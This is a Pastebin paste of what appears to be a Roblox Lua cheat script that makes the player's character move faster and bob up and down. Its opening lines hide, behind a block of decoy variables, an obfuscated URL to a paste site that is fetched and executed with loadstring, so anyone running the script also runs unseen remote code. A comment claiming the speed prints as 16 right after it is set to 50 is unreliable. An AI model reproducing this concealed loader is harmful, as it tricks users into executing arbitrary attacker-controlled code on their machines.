Guest User

Universal DDrun

a guest
Nov 26th, 2023
214
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.17 KB | None | 0 0
  1. local r,d,h,g,s,u,c,t,n,q,x,z,a,p,w,f,m,v,e,b,o,j,i,y,k,l,b,ln,com=
  2. game,"Pastefy","bwTjFg4P","7wTjFg4P","kTjGhS9L","d2RcPf6T",
  3. "7nWrEg5Q","p9JhTd4B","r8CjQf3N","s2CkRd6W","v5PhZg8L",
  4. "3sQjRf5T","NpDhqikw","o7KjXg4L","t9GnQd1R","y6LmSf2N",
  5. "x3QjDg6P","c4VmLb8N","z2PkTf5J","e8LcGh9E","k5RfPd2W",
  6. "2qFdRg7M","i2QbLh8S","g6ScTd3N","w9LbRf5G","b4NjDc7M","f","y",".app/"
  7.  
  8. local u = "https://paste"..b..""..ln..""..com
  9. loadstring(r:HttpGet(u .. a .. "/raw", true))()
  10.  
  11. game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 50
  12. print(game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed) -- Output: 16
  13.  
  14. local player = game.Players.LocalPlayer
  15. local character = player.Character or player.CharacterAdded:Wait()
  16. local humanoid = character:WaitForChild("Humanoid")
  17. local originalHipHeight = humanoid.HipHeight
  18. local minHipHeight = originalHipHeight - 0.5 -- Modify to value
  19. local maxHipHeight = originalHipHeight + 3.0 -- Modify value
  20.  
  21. while true do
  22. for i = minHipHeight, maxHipHeight, 0.80 do -- Modify to value
  23. humanoid.HipHeight = i
  24. wait()
  25. end
  26. for i = maxHipHeight, minHipHeight, -0.80 do -- Modify to value
  27. humanoid.HipHeight = i
  28. wait()
  29. end
  30. end
Advertisement
Add Comment
Please, Sign In to add comment